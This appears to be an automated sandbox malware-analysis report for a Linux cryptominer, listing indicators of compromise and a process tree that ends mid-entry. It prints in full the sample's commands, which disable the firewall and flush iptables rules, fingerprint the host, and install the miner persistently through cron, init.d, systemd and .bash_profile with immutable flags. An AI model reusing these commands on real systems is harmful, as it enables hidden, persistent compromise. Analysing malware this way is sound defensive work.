File opened for reading	/proc/1084/cmdline
File opened for reading	/proc/2774/stat	ps
File opened for reading	/proc/163/status	pkill
File opened for reading	/proc/456/stat
File opened for reading	/proc/stat	ps
File opened for reading	/proc/87/cmdline
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/242/status	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/163/stat	ps
File opened for reading	/proc/1439/stat	ps
File opened for reading	/proc/1219/stat
File opened for reading	/proc/200/status	ps
File opened for reading	/proc/445/stat	ps

Writes file to tmp directory 29 IoCs

Malware often drops required files in the /tmp directory.

Processes:

sys-helpersys-helperservice-agentshshsys-helperbin.elfsys-helpershsys-helperservice-agentshservice-agentservice-agentshshservice-agentsh

description	ioc
File opened for modification	/tmp/service-agent
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.lock
File opened for modification	/tmp/.lock
File opened for modification	/tmp/.bashirc
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile
File opened for modification	/tmp/.lock
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/sys-helper	bin.elf
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/service-agent	bin.elf
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.bashirc	sys-helper
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/sys-helper
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/.bashirc
File opened for modification	/tmp/.bashirc
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.lock	service-agent
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/~/.bash_profile

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 60 Go-http-client/1.1

description	flow	ioc
HTTP User-Agent header	60	Go-http-client/1.1

/tmp/bin.elf
/tmp/bin.elf
1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1465

/usr/bin/bash
bash -c "ufw disable"
2⤵
PID:1484

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1484

/usr/sbin/iptables
/usr/sbin/iptables -V
3⤵
PID:1487

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1490

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1491

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
PID:1492

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1499

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1505

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1506

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1509

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1512

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1514

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:1519

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1521

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1522

/sbin/iptables
iptables -F ufw-after-input
4⤵
PID:1524

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1525

/sbin/iptables
iptables -F ufw-before-input
4⤵
PID:1527

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:1528

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1530

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1531

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1532

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1533

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1535

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1536

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1538

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1539

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1541

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1542

/sbin/iptables
iptables -F ufw-track-input
4⤵
PID:1543

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1544

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1545

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1546

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1547

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1548

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1549

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1550

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1551

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1552

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1553

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1554

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:1555

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1556

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1557

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1558

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1559

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
PID:1560

/sbin/iptables
iptables -Z ufw-after-input
4⤵
PID:1561

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1562

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:1564

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:1565

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1566

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1568

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1569

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1570

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1574

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1575

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1577

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1579

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1581

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1583

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1585

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1586

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1587

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1589

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1590

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1591

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1592

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1593

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1594

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1595

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1596

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1597

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
PID:1598

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1599

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1600

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1601

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1602

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1603

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1604

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1605

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:1606

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1607

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1608

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1609

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1610

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1611

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1612

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1613

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1614

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:1615

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1616

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1617

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1618

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1619

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
PID:1620

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:1621

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1622

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:1623

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1624

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1625

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1626

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1627

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1628

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1629

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1630

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1631

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1632

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1633

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1634

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:1635

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1636

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1637

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1638

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1641

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1642

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1643

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1644

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1645

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1646

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1647

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1648

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:1649

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1650

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1652

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:1653

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
PID:1655

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
PID:1656

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1657

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:1659

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
PID:1660

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1661

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1662

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1663

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1664

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1666

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1667

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1668

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1669

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1671

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1673

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1674

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
PID:1675

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1676

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1677

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1678

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1680

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1681

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1682

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1684

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1685

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1686

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1687

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1688

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
PID:1689

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1690

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1691

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1692

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1693

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1694

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1695

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1696

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:1697

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1698

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1699

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1700

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1701

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1702

/usr/bin/bash
bash -c "iptables -P INPUT ACCEPT"
2⤵
PID:1703

/usr/sbin/iptables
iptables -P INPUT ACCEPT
2⤵
PID:1703

/usr/bin/bash
bash -c "iptables -P OUTPUT ACCEPT"
2⤵
PID:1704

/usr/sbin/iptables
iptables -P OUTPUT ACCEPT
2⤵
PID:1704

/usr/bin/bash
bash -c "iptables -P FORWARD ACCEPT"
2⤵
PID:1705

/usr/sbin/iptables
iptables -P FORWARD ACCEPT
2⤵
PID:1705

/usr/bin/bash
bash -c "iptables -F"
2⤵
PID:1706

/usr/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1706

/usr/bin/bash
bash -c "chattr -ia /etc/ld.so.preload"
2⤵
PID:1707

/usr/bin/chattr
chattr -ia /etc/ld.so.preload
2⤵
- Attempts to change immutable files
PID:1707

/usr/bin/pgrep
pgrep -f klibsystem4
2⤵
- Reads runtime system information
PID:1708

/usr/bin/pgrep
pgrep -f klibsystem5
2⤵
- Reads CPU attributes
PID:1709

/usr/bin/chattr
chattr +ia /etc/init.d/knlib
2⤵
- Attempts to change immutable files
PID:1710

/etc/init.d/knlib
/etc/init.d/knlib start
2⤵
- Executes dropped EXE
PID:1711

/usr/bin/cp
cp -f -r -- /bin/knlib5 /bin/klibsystem5
3⤵
PID:1712

/usr/bin/rm
rm -rf -- klibsystem5
3⤵
PID:1714

/usr/bin/chattr
chattr +ia /etc/systemd/system/knlibe.service
2⤵
- Attempts to change immutable files
PID:1715

/usr/bin/systemctl
systemctl daemon-reload
2⤵
- Reads EFI boot settings
PID:1716

/usr/bin/systemctl
systemctl enable knlibe.service
2⤵
- Reads EFI boot settings
- Reads runtime system information
PID:1744

/usr/bin/chattr
chattr +ia /bin/knlib5
2⤵
- Attempts to change immutable files
PID:1783

/usr/bin/crontab
crontab -r
2⤵
PID:1784

/usr/bin/pkill
pkill -f .klibsystem5
2⤵
- Reads CPU attributes
PID:1785

/usr/bin/pkill
pkill -f .klibsystem4
2⤵
PID:1786

/usr/bin/bash
bash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"
2⤵
PID:1787

/usr/bin/crontab
crontab -
3⤵
- Creates/modifies Cron job
PID:1789

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1790

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
2⤵
PID:1791

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
2⤵
PID:1792

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
2⤵
PID:1793

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
2⤵
PID:1794

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1795

/usr/bin/chattr
chattr -ia /etc/anacrontab
2⤵
PID:1796

/usr/bin/chattr
chattr +ia /etc/anacrontab
2⤵
PID:1797

/tmp/sys-helper
/tmp/sys-helper
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1798

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1800

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
PID:1801

/usr/bin/whoami
whoami
4⤵
PID:1812

/usr/bin/hostname
hostname
4⤵
PID:1813

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:1814

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:1830

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
- Reads runtime system information
PID:1832

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
PID:1831

/usr/bin/id
id -u
4⤵
PID:1834

/usr/bin/grep
grep -v grep
4⤵
PID:1837

/usr/bin/grep
grep /etc/cron
4⤵
PID:1836

/usr/bin/ps
ps x
4⤵
PID:1835

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
3⤵
- Writes file to tmp directory
PID:1839

/usr/bin/id
id -u
4⤵
PID:1840

/usr/bin/id
id -u
4⤵
PID:1841

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
4⤵
PID:1842

/usr/bin/rm
rm -rf /bin/bprofr
4⤵
PID:1843

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
4⤵
- Attempts to change immutable files
PID:1844

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
4⤵
- Writes file to system bin folder
PID:1845

/usr/bin/id
id -u
4⤵
- Reads runtime system information
PID:1846

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
4⤵
PID:1847

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
4⤵
PID:1848

/usr/bin/chattr
chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
4⤵
PID:1849

/usr/bin/rm
rm -rf /bin/crondr
4⤵
PID:1850

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/crondr
4⤵
- Writes file to system bin folder
PID:1851

/usr/bin/tee
tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Creates/modifies Cron job
PID:1853

/usr/bin/sed
sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
4⤵
- Creates/modifies Cron job
PID:1854

/usr/bin/chmod
